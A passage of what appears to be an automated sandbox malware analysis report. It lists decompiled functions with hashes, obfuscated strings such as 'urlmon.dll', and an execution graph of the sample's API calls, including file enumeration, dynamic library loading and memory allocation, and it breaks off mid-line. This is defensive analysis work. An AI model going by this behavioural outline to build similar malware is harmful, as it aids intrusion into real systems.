                                                                                      • Opcode ID: 07a1999492f3a384fb03a1ec5612f51b1d0cd58c1b28e9d7f09d6b5ab6ef1d80
                                                                                      • Instruction ID: 8a0dcf4af2a7e29260bc69470fe4b8e2b23ce8dc84dfc74f86aca00289e00c5c
                                                                                      • Opcode Fuzzy Hash: 07a1999492f3a384fb03a1ec5612f51b1d0cd58c1b28e9d7f09d6b5ab6ef1d80
                                                                                      • Instruction Fuzzy Hash: DCE09AB6340305BBDA14EE99DC45FEB37ADEFC9710F004429FA08AB240D6B0B8108BB5
                                                                                      Function 0550923A Relevance: .0, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fd380f69e25ad44fda708c3020d554de72344ff8262616012a92947c5b8ee787
                                                                                      • Instruction ID: 5a8e0d1dfa5faf575971208a43d6d6580eee556ea15e88ab67027f9d7070af0b
                                                                                      • Opcode Fuzzy Hash: fd380f69e25ad44fda708c3020d554de72344ff8262616012a92947c5b8ee787
                                                                                      • Instruction Fuzzy Hash: EBF08271805209EBDB14CFA4D845BDEBBB9FB44320F10836AE8289B2C0D63497548781
                                                                                      Function 0551C5EA Relevance: .0, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cc3298b7eaaef6444298a1ce56b011fbbee49775b251919faa8654a664a6af54
                                                                                      • Instruction ID: 56ef9c53f05153dcd5a0b53ed23c3ed45f2b5b6f1fc80c7daf17369f7cdf8fad
                                                                                      • Opcode Fuzzy Hash: cc3298b7eaaef6444298a1ce56b011fbbee49775b251919faa8654a664a6af54
                                                                                      • Instruction Fuzzy Hash: D5E0863674121437E220659D9C09FABBBADFBC5E60F090168FE099B340E561FD0146EC
                                                                                      Function 05509237 Relevance: .0, Instructions: 27COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f146a57d091e1787a0c3077990fec7c6abda7e2978ff3a82677fa673bf68a7fe
                                                                                      • Instruction ID: 0fb81d02d86ab23c70ea5085cba4e12d849186502e28b494235b325d23ce2cbe
                                                                                      • Opcode Fuzzy Hash: f146a57d091e1787a0c3077990fec7c6abda7e2978ff3a82677fa673bf68a7fe
                                                                                      • Instruction Fuzzy Hash: BCE09271919109EBDB04CFA4E855BEEBBB9EB48310F10436AFC18DB280D6399B948785
                                                                                      Function 0551A4BA Relevance: .0, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b128fb59003eb0adba234b6788b47a4bfe4ce5fdf048b5cfc933ca3de64206b9
                                                                                      • Instruction ID: 499537a2cc2c45f2b8707050f771a086c7363c111b5698baf862c583b1d2f629
                                                                                      • Opcode Fuzzy Hash: b128fb59003eb0adba234b6788b47a4bfe4ce5fdf048b5cfc933ca3de64206b9
                                                                                      • Instruction Fuzzy Hash: 26E04F763402147BD620EA5ACC40FDB7B6DEFD6711F014015FA49AB240CAB0790187A1

                                                                                      Non-executed Functions

                                                                                      Function 0550509C Relevance: 51.4, Strings: 41, Instructions: 167COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                      • API String ID: 0-3248090998
                                                                                      • Opcode ID: 18203ad841b6864427a560b6bb60748fda1309f680e5ce0b61a6112805a989c2
                                                                                      • Instruction ID: 72bf7872564cc764c2b045826d196c3beceb5480af1646a60621ea45065726af
                                                                                      • Opcode Fuzzy Hash: 18203ad841b6864427a560b6bb60748fda1309f680e5ce0b61a6112805a989c2
                                                                                      • Instruction Fuzzy Hash: A3910FF08052998ECB218F55A5603DFBF71BB85204F1581E9C6AA7B243C3BE4E45DF90
                                                                                      Function 05513ACA Relevance: 34.0, Strings: 27, Instructions: 264COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                      • API String ID: 0-1002149817
                                                                                      • Opcode ID: de6da6c457ef5ad9fcf51ba19790d9ad61090378646c6391b5d845ec2a08a8ca
                                                                                      • Instruction ID: 9cd57dc775688fc9ec719c234e1c2d6b84d4b016d5adb87a92feda38a51719a7
                                                                                      • Opcode Fuzzy Hash: de6da6c457ef5ad9fcf51ba19790d9ad61090378646c6391b5d845ec2a08a8ca
                                                                                      • Instruction Fuzzy Hash: 40C12FB1D002699AEB60DFA5CC44BEEBBB9BF44704F0085DAE50CB7241E7B54A88CF55
                                                                                      Function 054F48EE Relevance: 33.8, Strings: 27, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (osj$+njf$-(-<$:7)0$:7)0$>+nj$?+fw$`b(f$`ibc$b<q:$e4<v$f`b($fsnh$fsnh$fwwk$i(tn$k+fw$ndfs$nhi($ofi`$pbew$sjk,$v:7)$v:7)$wi`+$wknd$wknd
                                                                                      • API String ID: 0-215591994
                                                                                      • Opcode ID: 0b194d7baa0b79d02d3a8831a53e97bd12b6b8c1556c4b45dd9658f9596e750e
                                                                                      • Instruction ID: 136b8746ad64b2ffecbbf1df7ca23b56e2be180c0354d6c52662224f5c05b2ae
                                                                                      • Opcode Fuzzy Hash: 0b194d7baa0b79d02d3a8831a53e97bd12b6b8c1556c4b45dd9658f9596e750e
                                                                                      • Instruction Fuzzy Hash: 653121B0D093899BCF14CFEAEA826DDBF71FB04744F208608D4146B259D7351A22CF96
                                                                                      Function 0550C11A Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                      • API String ID: 0-392141074
                                                                                      • Opcode ID: 2ccb6d27f3608386a638da94827ade35dbead1070bdf7ae3f8a96a40d857fe99
                                                                                      • Instruction ID: f1f979bf81fe3e71d8187398d4f1ad48e578a7fc8155218bf9c6c314fb0b85af
                                                                                      • Opcode Fuzzy Hash: 2ccb6d27f3608386a638da94827ade35dbead1070bdf7ae3f8a96a40d857fe99
                                                                                      • Instruction Fuzzy Hash: 5C7161B1D00318BAEB15DBA4CC85FEEBBBDBF48300F00459DE919A6140EB725B488F65
                                                                                      Function 054F4A0B Relevance: 16.3, Strings: 13, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 3$:7)0$:7)0$FZ_W$QxZG$_VdV$_ZXV$`RUR$b<q:$e4<v$p[A\$r]WA$~\IZ
                                                                                      • API String ID: 0-1026646956
                                                                                      • Opcode ID: 716dd61557191e8cae19ee5001ae2abd58d399d363fb7334c54e0fc44c963f43
                                                                                      • Instruction ID: 07c7f8adb27411f445071bc635f720373fd67d7a5297aebbba031ce8ff0bf544
                                                                                      • Opcode Fuzzy Hash: 716dd61557191e8cae19ee5001ae2abd58d399d363fb7334c54e0fc44c963f43
                                                                                      • Instruction Fuzzy Hash: C04122B0C04258DBDB20CFE4D9846DDBFB1FB04704FA08589D46A2F201D7760A0ACF61
                                                                                      Function 054FFE21 Relevance: 13.8, Strings: 11, Instructions: 87COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                      • API String ID: 0-685823316
                                                                                      • Opcode ID: 20a550708f072f06e3d0c594ba1762bb2ede6a697bbd5a4af5e41018802d28be
                                                                                      • Instruction ID: 9f51916538db81f677ebad9fa698863dc906ce5993f56ee6c634fc72d13b158e
                                                                                      • Opcode Fuzzy Hash: 20a550708f072f06e3d0c594ba1762bb2ede6a697bbd5a4af5e41018802d28be
                                                                                      • Instruction Fuzzy Hash: 793184B1D51218AEEF40DFE4CC89BEE7BB9BB44304F04815DE608BA180DBB51648CBA5
                                                                                      Function 054F849A Relevance: 11.3, Strings: 9, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !$1$4$A$L$^$e$q$q
                                                                                      • API String ID: 0-3638664181
                                                                                      • Opcode ID: 3d051501caa2cf21db3366f9993def72e7b5d88092d63332505618eff565eaaf
                                                                                      • Instruction ID: 6e82d073f6b668e476da87d73f72c99f8fd3202ae2e5bff7227c33dabc858cec
                                                                                      • Opcode Fuzzy Hash: 3d051501caa2cf21db3366f9993def72e7b5d88092d63332505618eff565eaaf
                                                                                      • Instruction Fuzzy Hash: 5A11B020D0C3CAD9DB12C6BC84046EEBF715F12218F0882D9D5E56B2D2D2B95745D7A6
                                                                                      Function 05507255 Relevance: 10.1, Strings: 8, Instructions: 137COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .$P$e$i$m$o$r$x
                                                                                      • API String ID: 0-620024284
                                                                                      • Opcode ID: 529e0ec339277d9cce60750c08ac3387ba96d16ece7f97b770430495e26a5895
                                                                                      • Instruction ID: ff4b6a41527738567a87b6fb3a49676bfc135fed7c150a75b8050f82db8a7bfb
                                                                                      • Opcode Fuzzy Hash: 529e0ec339277d9cce60750c08ac3387ba96d16ece7f97b770430495e26a5895
                                                                                      • Instruction Fuzzy Hash: 2E51A7B2940218BAEB14EBA4CC49FDA777DBF94300F00859DA90997140EBB55B488FA5
                                                                                      Function 0551432A Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: L$S$\$a$c$e$l
                                                                                      • API String ID: 0-3322591375
                                                                                      • Opcode ID: e7bef2b088bea7218fb0773293770e332c3fd41e3dbe4db905ea03e5e89706af
                                                                                      • Instruction ID: 7a580584597d48a5f9417f06667d168ce82f75cea55648c9e1618576f74efe6d
                                                                                      • Opcode Fuzzy Hash: e7bef2b088bea7218fb0773293770e332c3fd41e3dbe4db905ea03e5e89706af
                                                                                      • Instruction Fuzzy Hash: F0415672D05218AEDF10EFA4DC89AEEBBF9BF48310F05855ADD0AA7100E77259458F94
                                                                                      Function 0550BECB Relevance: 7.7, Strings: 6, Instructions: 180COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: F$P$T$f$r$x
                                                                                      • API String ID: 0-2523166886
                                                                                      • Opcode ID: 17316c19fea47a397f570c04d88be202dd9bd39c9ef15c4b00e4fd198cbdc5aa
                                                                                      • Instruction ID: d18397f1e17fd5ac43e65114e90cc4d86cbe250cd596acfe9a44a69b65a3a90d
                                                                                      • Opcode Fuzzy Hash: 17316c19fea47a397f570c04d88be202dd9bd39c9ef15c4b00e4fd198cbdc5aa
                                                                                      • Instruction Fuzzy Hash: 7151D571A04305AAFB34DF65CC88BEAF7F8FF45740F004619E94A561C0E7B5AA44CBA2
                                                                                      Function 0550BBAA Relevance: 6.5, Strings: 5, Instructions: 236COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $ >ll$e$h$o
                                                                                      • API String ID: 0-3217287860
                                                                                      • Opcode ID: 539582bc43d260b0faf799d0c7f20cee59e9dfb971bae1ff5f5734325cb374c0
                                                                                      • Instruction ID: e0b32a6acd3f8af3aac25da5c1fcca15940ae4acb5f6cddf1af52a1e25afd07d
                                                                                      • Opcode Fuzzy Hash: 539582bc43d260b0faf799d0c7f20cee59e9dfb971bae1ff5f5734325cb374c0
                                                                                      • Instruction Fuzzy Hash: 418176B2940259AAEB24EB54CC89FEE737CFF88300F0445DDE90966040EBB55F858FA5
                                                                                      Function 0550B5DA Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $i$l$o$u
                                                                                      • API String ID: 0-2051669658
                                                                                      • Opcode ID: 8565aab86e351ca4d6503d665da7b4841f62e42a66f1babe3590de0b63572266
                                                                                      • Instruction ID: 38f62a99596f9acaa38a5e596bec3464bea5d352a22ac7910b3ab28dd534c405
                                                                                      • Opcode Fuzzy Hash: 8565aab86e351ca4d6503d665da7b4841f62e42a66f1babe3590de0b63572266
                                                                                      • Instruction Fuzzy Hash: 6F6121B5A00305AFDB24DBA4CC84FEFB7FDFB88710F108959E55597280D635AA45CB50
                                                                                      Function 0550743A Relevance: 6.3, Strings: 5, Instructions: 88COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: -$2$3$3$7
                                                                                      • API String ID: 0-3991079922
                                                                                      • Opcode ID: 20b6886a0511afcc9895669d3c54a8ecea7dcf4d4c1338defab4f65e6ac1aeef
                                                                                      • Instruction ID: 504377acdace4e9fd68a66b17e5815a1630f85d341de2e26deab51e93aa01168
                                                                                      • Opcode Fuzzy Hash: 20b6886a0511afcc9895669d3c54a8ecea7dcf4d4c1338defab4f65e6ac1aeef
                                                                                      • Instruction Fuzzy Hash: CE2132B1A10119BBEB15DBA4CD45BEE77B9FF48304F004159FD04A7240E776AE058BE5
                                                                                      Function 0550B267 Relevance: 5.3, Strings: 4, Instructions: 304COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $e$k$o
                                                                                      • API String ID: 0-3624523832
                                                                                      • Opcode ID: bf3a1959083af096e637ed5f8f30c9290539da0a7748c00154a889ef3263771a
                                                                                      • Instruction ID: 8099f9fb833a95be520bc2fab575d02a3c0efda37b4cb699cfdd188f0bf41f53
                                                                                      • Opcode Fuzzy Hash: bf3a1959083af096e637ed5f8f30c9290539da0a7748c00154a889ef3263771a
                                                                                      • Instruction Fuzzy Hash: 0FB109B5A00705AFDB24DBA4CC85FEFB7BABF88710F108558F619A7280D675AB41CB50
                                                                                      Function 0550B26A Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $e$k$o
                                                                                      • API String ID: 0-3624523832
                                                                                      • Opcode ID: 0885f8cabd546b43c5a132ab9e0c4539c25649a9d06c046cac59ea196f25c022
                                                                                      • Instruction ID: fb132f925c5a0420770e7f62cde466c8512395a94d4e9429b73b07039482ec62
                                                                                      • Opcode Fuzzy Hash: 0885f8cabd546b43c5a132ab9e0c4539c25649a9d06c046cac59ea196f25c022
                                                                                      • Instruction Fuzzy Hash: 0D610AB1A00709AFDB64DFA4CC95FEFB7B9BF88700F108558E61997284D771AA41CB50
                                                                                      Function 0550B129 Relevance: 5.1, Strings: 4, Instructions: 122COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                      • API String ID: 0-2877786613
                                                                                      • Opcode ID: 204234d1976407d9214dc14b2ce8aff4deb33bf9594961efb2db7d795acafe88
                                                                                      • Instruction ID: 1ed9bc76f4c95fe0c4492838824a76a07746bd72171c15a77aee8f74118c0a0b
                                                                                      • Opcode Fuzzy Hash: 204234d1976407d9214dc14b2ce8aff4deb33bf9594961efb2db7d795acafe88
                                                                                      • Instruction Fuzzy Hash: 19415F71A512197AEB01EB90CC96FFFBB7CFF95700F004109FA056A180EBB55A0187EA
                                                                                      Function 0550B12A Relevance: 5.1, Strings: 4, Instructions: 120COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, Offset: 05190000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_5190000_ybjXXpYwhPHZD.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                      • API String ID: 0-2877786613
                                                                                      • Opcode ID: 88e119ff2180a0050900eacade21771d4e6dbe2538b787464c22e8b38e6ede55
                                                                                      • Instruction ID: f9a8f5af6a653791b682a79a1ce30c1deb3b626ccb04bd91bc74d32c4622c5dd
                                                                                      • Opcode Fuzzy Hash: 88e119ff2180a0050900eacade21771d4e6dbe2538b787464c22e8b38e6ede55
                                                                                      • Instruction Fuzzy Hash: EA314471A512197AE711EB90CC96FFFBB7CFF95700F004049FA056A180EBB56A0587EA

                                                                                      Execution Graph

                                                                                      Execution Coverage:2.6%
                                                                                      Dynamic/Decrypted Code Coverage:4.8%
                                                                                      Signature Coverage:0.7%
                                                                                      Total number of Nodes:441
                                                                                      Total number of Limit Nodes:70
                                                                                      execution_graph 98983 28b2a4c 98986 28b6540 98983->98986 98985 28b2a83 98987 28b6573 98986->98987 98988 28b6594 98987->98988 98993 28c9130 98987->98993 98988->98985 98990 28b65b7 98990->98988 98991 28c95c0 NtClose 98990->98991 98992 28b6639 98991->98992 98992->98985 98994 28c914d 98993->98994 98997 47d2ca0 LdrInitializeThunk 98994->98997 98995 28c9179 98995->98990 98997->98995 98581 28b3403 98586 28b7fc0 98581->98586 98585 28b342f 98587 28b3413 98586->98587 98588 28b7fda 98586->98588 98587->98585 98592 28c95c0 98587->98592 98595 28c8cb0 98588->98595 98591 28c95c0 NtClose 98591->98587 98593 28c95dd 98592->98593 98594 28c95ee NtClose 98593->98594 98594->98585 98596 28c8cca 98595->98596 98599 47d35c0 LdrInitializeThunk 98596->98599 98597 28b80aa 98597->98591 98599->98597 98600 4abf0a1 NtQueryInformationProcess 98601 4abf0b4 98600->98601 98602 28b2580 98607 28c8c10 98602->98607 98606 28b25cb 98608 28c8c2a 98607->98608 98616 47d2c0a 98608->98616 98609 28b25b6 98611 28c9660 98609->98611 98612 28c96e9 98611->98612 98614 28c9688 98611->98614 98619 47d2e80 LdrInitializeThunk 98612->98619 98613 28c971a 98613->98606 98614->98606 98617 47d2c1f LdrInitializeThunk 98616->98617 98618 47d2c11 98616->98618 98617->98609 98618->98609 98619->98613 98998 28bc840 99000 28bc869 98998->99000 98999 28bc96d 99000->98999 99001 28bc913 FindFirstFileW 99000->99001 99001->98999 99002 28bc92e 99001->99002 99003 28bc954 FindNextFileW 99002->99003 99003->99002 99004 28bc966 FindClose 99003->99004 99004->98999 98620 28c1d00 98625 28c1d19 98620->98625 98621 28c1da9 98622 28c1d64 98628 28cb610 98622->98628 98625->98621 98625->98622 98626 28c1da4 98625->98626 98627 28cb610 RtlFreeHeap 98626->98627 98627->98621 98631 28c9930 98628->98631 98630 28c1d74 98632 28c994d 98631->98632 98633 28c995e RtlFreeHeap 98632->98633 98633->98630 99005 28c62c0 99006 28c631a 99005->99006 99008 28c6327 99006->99008 99009 28c3cc0 99006->99009 99010 28cb590 NtAllocateVirtualMemory 99009->99010 99011 28c3d01 99010->99011 99012 28b47f0 LdrLoadDll 99011->99012 99014 28c3e0e 99011->99014 99015 28c3d47 99012->99015 99013 28c3d90 Sleep 99013->99015 99014->99008 99015->99013 99015->99014 99016 28c8a40 99017 28c8acc 99016->99017 99019 28c8a6b 99016->99019 99021 47d2ee0 LdrInitializeThunk 99017->99021 99018 28c8afd 99021->99018 99022 28c8bc0 99023 28c8bda 99022->99023 99026 47d2df0 LdrInitializeThunk 99023->99026 99024 28c8c02 99026->99024 98635 28a9e90 98638 28aa267 98635->98638 98637 28aa674 98638->98637 98639 28cb290 98638->98639 98640 28cb2b3 98639->98640 98645 28a4160 98640->98645 98642 28cb2bf 98643 28cb2f8 98642->98643 98648 28c5850 98642->98648 98643->98637 98652 28b3510 98645->98652 98647 28a416d 98647->98642 98649 28c58b2 98648->98649 98651 28c58bf 98649->98651 98663 28b1ce0 98649->98663 98651->98643 98653 28b3527 98652->98653 98655 28b3540 98653->98655 98656 28c9fe0 98653->98656 98655->98647 98657 28c9ffa 98656->98657 98658 28ca029 98657->98658 98659 28c8c10 LdrInitializeThunk 98657->98659 98658->98655 98660 28ca086 98659->98660 98661 28cb610 RtlFreeHeap 98660->98661 98662 28ca09c 98661->98662 98662->98655 98664 28b1d1b 98663->98664 98679 28b80d0 98664->98679 98666 28b1d23 98678 28b1ff0 98666->98678 98690 28cb6f0 98666->98690 98668 28b1d39 98669 28cb6f0 RtlAllocateHeap 98668->98669 98670 28b1d4a 98669->98670 98671 28cb6f0 RtlAllocateHeap 98670->98671 98673 28b1d5b 98671->98673 98674 28b1dec 98673->98674 98701 28b6ca0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 98673->98701 98693 28b47f0 98674->98693 98676 28b1fa2 98697 28c8190 98676->98697 98678->98651 98680 28b80fc 98679->98680 98681 28b7fc0 2 API calls 98680->98681 98682 28b811f 98681->98682 98683 28b8129 98682->98683 98684 28b8141 98682->98684 98685 28b8134 98683->98685 98687 28c95c0 NtClose 98683->98687 98686 28b815d 98684->98686 98688 28c95c0 NtClose 98684->98688 98685->98666 98686->98666 98687->98685 98689 28b8153 98688->98689 98689->98666 98702 28c98e0 98690->98702 98692 28cb70b 98692->98668 98694 28b4814 98693->98694 98695 28b4850 LdrLoadDll 98694->98695 98696 28b481b 98694->98696 98695->98696 98696->98676 98698 28c81f2 98697->98698 98700 28c81ff 98698->98700 98705 28b2000 98698->98705 98700->98678 98701->98674 98703 28c98fd 98702->98703 98704 28c990e RtlAllocateHeap 98703->98704 98704->98692 98723 28b83a0 98705->98723 98707 28b2020 98715 28b2562 98707->98715 98727 28c1350 98707->98727 98709 28b207e 98709->98715 98730 28cc6b0 98709->98730 98711 28b2234 98735 28cc7e0 98711->98735 98714 28c5ac0 LdrInitializeThunk 98718 28b2296 98714->98718 98715->98700 98716 28b2249 98716->98718 98741 28b0b20 98716->98741 98718->98714 98718->98715 98720 28b0b20 LdrInitializeThunk 98718->98720 98748 28b8340 98718->98748 98719 28b8340 LdrInitializeThunk 98722 28b23e1 98719->98722 98720->98718 98722->98718 98722->98719 98744 28c5ac0 98722->98744 98724 28b83ad 98723->98724 98725 28b83ce SetErrorMode 98724->98725 98726 28b83d5 98724->98726 98725->98726 98726->98707 98729 28c1371 98727->98729 98752 28cb590 98727->98752 98729->98709 98731 